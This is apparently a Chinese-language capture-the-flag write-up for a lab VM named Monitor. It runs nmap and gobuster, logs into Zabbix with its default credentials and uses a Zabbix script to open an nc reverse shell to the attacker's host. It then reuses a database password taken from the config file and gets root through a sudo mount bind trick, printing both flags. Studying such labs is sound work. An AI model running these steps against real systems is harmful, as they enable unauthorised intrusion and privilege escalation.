信息收集

cmd
┌──(root㉿kali)-[~]└─# arp-scan -l | grep PCS192.168.31.92   08:00:27:1d:29:60       PCS Systemtechnik GmbH                                                                                                                                                            ┌──(root㉿kali)-[~]└─# IP=192.168.31.92
cmd
┌──(root㉿kali)-[~]└─# nmap -sV -sC -A $IP -PnStarting Nmap 7.95 ( https://nmap.org ) at 2025-08-10 08:34 EDTNmap scan report for Monitor (192.168.31.92)Host is up (0.00059s latency).Not shown: 996 closed tcp ports (reset)PORT     STATE SERVICE VERSION22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)| ssh-hostkey: |   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)80/tcp   open  http    Apache httpd 2.4.62 ((Debian))|_http-title: \xE7\x9B\x91\xE6\x8E\xA7\xE7\xB3\xBB\xE7\xBB\x9F\xE7\x99\xBB\xE5\xBD\x95|_http-server-header: Apache/2.4.62 (Debian)111/tcp  open  rpcbind 2-4 (RPC #100000)| rpcinfo: |   program version    port/proto  service|   100000  2,3,4        111/tcp   rpcbind|   100000  2,3,4        111/udp   rpcbind|   100000  3,4          111/tcp6  rpcbind|   100000  3,4          111/udp6  rpcbind|   100003  3           2049/udp   nfs|   100003  3           2049/udp6  nfs|   100003  3,4         2049/tcp   nfs|   100003  3,4         2049/tcp6  nfs|   100005  1,2,3      36034/udp6  mountd|   100005  1,2,3      38236/udp   mountd|   100005  1,2,3      38947/tcp6  mountd|   100005  1,2,3      41683/tcp   mountd|   100021  1,3,4      32829/tcp6  nlockmgr|   100021  1,3,4      33419/tcp   nlockmgr|   100021  1,3,4      41563/udp   nlockmgr|   100021  1,3,4      60724/udp6  nlockmgr|   100227  3           2049/tcp   nfs_acl|   100227  3           2049/tcp6  nfs_acl|   100227  3           2049/udp   nfs_acl|_  100227  3           2049/udp6  nfs_acl2049/tcp open  nfs     3-4 (RPC #100003)MAC Address: 08:00:27:1D:29:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Device type: general purpose|routerRunning: Linux 4.X|5.X, MikroTik RouterOS 7.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTEHOP RTT     ADDRESS1   0.59 ms Monitor (192.168.31.92) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.21 seconds

目录扫描

cmd
┌──(root㉿kali)-[~]└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.31.92[+] Method:                  GET[+] Threads:                 10[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.6[+] Extensions:              html,bk,bak,tar,php3,zip,gz,shtml,php,txt[+] Timeout:                 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/.php                 (Status: 403) [Size: 278]/.html                (Status: 403) [Size: 278]/index.php            (Status: 200) [Size: 1841]/upload               (Status: 301) [Size: 315] [--> http://192.168.31.92/upload/]/logout.php           (Status: 302) [Size: 0] [--> index.php]/dashboard.php        (Status: 302) [Size: 0] [--> index.php]/zabbix               (Status: 301) [Size: 315] [--> http://192.168.31.92/zabbix/]/.html                (Status: 403) [Size: 278]/.php                 (Status: 403) [Size: 278]/server-status        (Status: 403) [Size: 278]Progress: 2426160 / 2426171 (100.00%)===============================================================Finished===============================================================

直接打开尝试登录,随便试了下弱密码 admin/admin 就进去了,不过没啥用

扫出来/zabbix ,搜了下默认账密是Admin/zabbix

Administration - Scripts 创建脚本

PenTest_MazeSec_Monitor-1

text
nc 192.168.31.58 23333 -e /bin/sh

kali 监听

text
nc -lvp 23333

Monitoring - Hosts 运行脚本反弹shell

PenTest_MazeSec_Monitor-2

/home/hyh/user.txt 中取得 flag

PenTest_MazeSec_Monitor-3

flag
flag{user-ab0e0561b1a833a6141ad2273744543c}

提权

现在用的 netcat shell 是一个非交互式 Shell,用起来很不方便,所以要先稳定 shell

按顺序执行:

cmd
script /dev/null -c bashCtrl + Zstty raw -echo; fgreset xtermexport TERM=xtermexport SHELL=/bin/bash

查看 zabbix 的 web 配置文件

cmd
zabbix@Monitor:/$ find / -name 'zabbix.conf.php' 2>/dev/null/usr/share/zabbix/conf/zabbix.conf.php/etc/zabbix/web/zabbix.conf.phpzabbix@Monitor:/$ cat /usr/share/zabbix/conf/zabbix.conf.php<?php// Zabbix GUI configuration file. $DB['TYPE']                             = 'MYSQL';$DB['SERVER']                   = 'localhost';$DB['PORT']                             = '0';$DB['DATABASE']                 = 'zabbix';$DB['USER']                             = 'zabbix';$DB['PASSWORD']                 = 'root123'; // Schema name. Used for PostgreSQL.$DB['SCHEMA']                   = ''; // Used for TLS connection.$DB['ENCRYPTION']               = false;$DB['KEY_FILE']                 = '';$DB['CERT_FILE']                = '';$DB['CA_FILE']                  = '';$DB['VERIFY_HOST']              = false;$DB['CIPHER_LIST']              = ''; // Vault configuration. Used if database credentials are stored in Vault secrets manager.$DB['VAULT_URL']                = '';$DB['VAULT_DB_PATH']    = '';$DB['VAULT_TOKEN']              = ''; // Use IEEE754 compatible value range for 64-bit Numeric (float) history values.// This option is enabled by default for new Zabbix installations.// For upgraded installations, please read database upgrade notes before enabling this option.$DB['DOUBLE_IEEE754']   = true; // Uncomment and set to desired values to override Zabbix hostname/IP and port.// $ZBX_SERVER                  = '';// $ZBX_SERVER_PORT             = ''; $ZBX_SERVER_NAME                = 'Zabbix'; $IMAGE_FORMAT_DEFAULT   = IMAGE_FORMAT_PNG; // Uncomment this block only if you are using Elasticsearch.// Elasticsearch url (can be string if same url is used for all types).//$HISTORY['url'] = [//      'uint' => 'http://localhost:9200',//      'text' => 'http://localhost:9200'//];// Value types stored in Elasticsearch.//$HISTORY['types'] = ['uint', 'text']; // Used for SAML authentication.// Uncomment to override the default paths to SP private key, SP and IdP X.509 certificates, and to set extra settings.//$SSO['SP_KEY']                        = 'conf/certs/sp.key';//$SSO['SP_CERT']                       = 'conf/certs/sp.crt';//$SSO['IDP_CERT']              = 'conf/certs/idp.crt';//$SSO['SETTINGS']              = [];

发现数据库密码是 root123,在 /home 下发现目录 hyh,尝试使用此密码登录用户 hyh

cmd
zabbix@Monitor:/$ ls /homehyhzabbix@Monitor:/$ su hyhPassword: hyh@Monitor:/$ iduid=1000(hyh) gid=1000(hyh) groups=1000(hyh)

查看 sudo 权限

cmd
hyh@Monitor:/$ sudo -lMatching Defaults entries for hyh on Monitor:    env_reset, mail_badpass,    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User hyh may run the following commands on Monitor:    (ALL) NOPASSWD: /usr/bin/mount

利用 mount 提权

cmd
hyh@Monitor:/$ sudo mount -o bind /bin/sh /bin/mounthyh@Monitor:/$ sudo mount# iduid=0(root) gid=0(root) groups=0(root)# cat /root/root.txtflag{root-deb15d884e04de6f6972b3c25e3cc11b}
text
flag{root-deb15d884e04de6f6972b3c25e3cc11b}